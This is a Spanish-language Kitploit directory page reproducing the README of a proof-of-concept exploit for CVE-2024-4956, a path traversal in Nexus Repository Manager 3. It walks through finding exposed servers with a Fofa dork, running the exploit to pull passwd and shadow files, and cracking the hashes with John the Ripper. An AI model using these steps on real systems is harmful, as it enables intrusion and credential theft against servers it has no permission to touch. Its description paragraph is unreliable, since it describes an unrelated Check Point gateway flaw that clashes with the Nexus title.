Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-4956 — POC - CVE-2024–4956 - Nexus Repository Manager 3 Path Traversal no autenticado | Kitploit
Herramientas/GitHubGitHub/verylazytech/cve-2024-4956
Descifrado de ContraseñasReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de Información
GitHubverylazytech/cve-2024-4956

CVE-2024-4956

POC - CVE-2024–4956 - Nexus Repository Manager 3 Path Traversal no autenticado

Ver Repositorio
164hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2024-4956

My Shop Medium Github Buy Me A Coffee

POC - CVE-2024–4956 - Nexus Repository Manager 3 Path Traversal No Autenticado

Potencialmente permite a un atacante leer cierta información en Check Point Security Gateways una vez conectados a internet y habilitados con Remote Access VPN o Mobile Access Software Blades. Hay disponible un parche de seguridad que mitiga esta vulnerabilidad.

Leer sobre ello — CVE-2024-4956

Aviso legal: Esta prueba de concepto (POC) se realiza únicamente con fines educativos y de pruebas éticas. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen responsabilidad alguna y no se hacen responsables de ningún uso indebido o daño causado por este programa.

Comenzando

Encontrar objetivos

Para encontrar posibles objetivos, use Fofa (similar a Shodan.io):

  • Fofa Dork: header="Server: Nexus/3.53.0-01 (OSS)"

Alt text

Primero, clone el repositorio:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-4956

Luego, elija su objetivo y añádalo al archivo list.txt en este formato:

  • https://ip_address

Ejecute el exploit:

root@kitploit:~
python3 CVE-2024-4956.py -l list.txt

El resultado son los archivos passwd y shadow encontrados:

Alt text

Ahora, después de encontrar los archivos passwd y shadow, puede intentar descifrar el hash con JohnTheRipper. Después de ejecutar el exploit, tiene 2 archivos, passwd y shadow, por lo que puede combinarlos en un solo archivo e intentar descifrarlos (yo usé rockyou.txt, pero puede ser cualquier lista de contraseñas):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Descargar herramienta